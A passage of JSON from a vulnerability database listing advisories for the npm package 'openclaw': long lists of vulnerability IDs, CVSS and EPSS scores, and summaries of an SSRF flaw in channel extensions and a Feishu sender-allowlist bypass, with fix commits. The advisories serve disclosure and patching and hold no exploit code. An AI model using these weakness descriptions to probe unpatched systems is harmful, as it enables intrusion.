ID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-4w7m-58cg-cmff"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xpnh-32hh-p7fb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91330?format=json","vulnerability_id":"VCID-xpr3-hg3h-z3bz","summary":"OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n## Summary\n\nSSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSeveral channel extensions still used raw `fetch()` against configured base URLs without the SSRF guard that was added for CVE-2026-28476. Commit `f92c92515bd439a71bd03eb1bc969c1964f17acf` routes those outbound requests through `fetchWithSsrFGuard` so configured endpoints cannot be rebound to blocked internal destinations.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f92c92515bd439a71bd03eb1bc969c1964f17acf`.\n\n## Fix Commit(s)\n\n- `f92c92515bd439a71bd03eb1bc969c1964f17acf`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35629","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14495","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14536","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14532","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35629"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"}],"url":"https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35629","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35629"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions"},{"reference_url":"https://github.com/advisories/GHSA-pg2v-8xwh-qhcc","reference_id":"GHSA-pg2v-8xwh-qhcc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pg2v-8xwh-qhcc"},{"reference_url":"https://github.com/advisories/GHSA-rhfg-j8jq-7v2h","reference_id":"GHSA-rhfg-j8jq-7v2h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rhfg-j8jq-7v2h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35629","GHSA-rhfg-j8jq-7v2h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xpr3-hg3h-z3bz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89514?format=json","vulnerability_id":"VCID-xryt-a83q-q7et","summary":"OpenClaw: Feishu thread history and quoted messages bypass sender allowlist\n## Summary\nFeishu thread history and quoted messages bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Feishu because fetched quoted/root/thread context bypasses sender allowlists, and SECURITY.md does not exempt remote sender-allowlist bypasses.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `f45e5a6569aab1d58cc6de25b19f1dc4c8779b85` — 2026-03-31T19:43:54+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41406","reference_id":"","reference_type":"","scores":[{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14323","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.1436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14358","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41406"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S: